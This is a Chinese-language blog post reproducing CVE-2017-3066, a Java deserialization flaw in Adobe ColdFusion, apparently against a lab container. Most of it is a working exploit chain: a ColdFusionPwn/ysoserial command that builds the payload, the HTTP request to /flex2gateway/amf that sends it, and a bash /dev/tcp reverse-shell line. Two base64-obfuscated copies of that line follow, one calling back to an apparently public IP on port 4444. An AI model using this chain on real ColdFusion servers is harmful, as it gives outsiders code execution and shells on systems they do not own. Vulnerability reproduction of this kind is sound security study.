Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)


Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

漏洞复现

使用ColdFusionPwn工具来生成POC:

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

POC生成于poc.ser文件中,将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf:

POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

进入容器中,发现/tmp/success已成功创建:

bash -i >& /dev/tcp/[IP address]/[port] 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}

将POC改成反弹shell:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS45Ni4xNC40MS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

成功反弹shell


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Couchdb 垂直权限绕过漏洞 Couchdb 垂直权限绕过漏洞
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)Apache CouchDB是一个开源数据库,专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduc
2019-01-08
下一篇 
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861) Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web
2019-01-07
  目录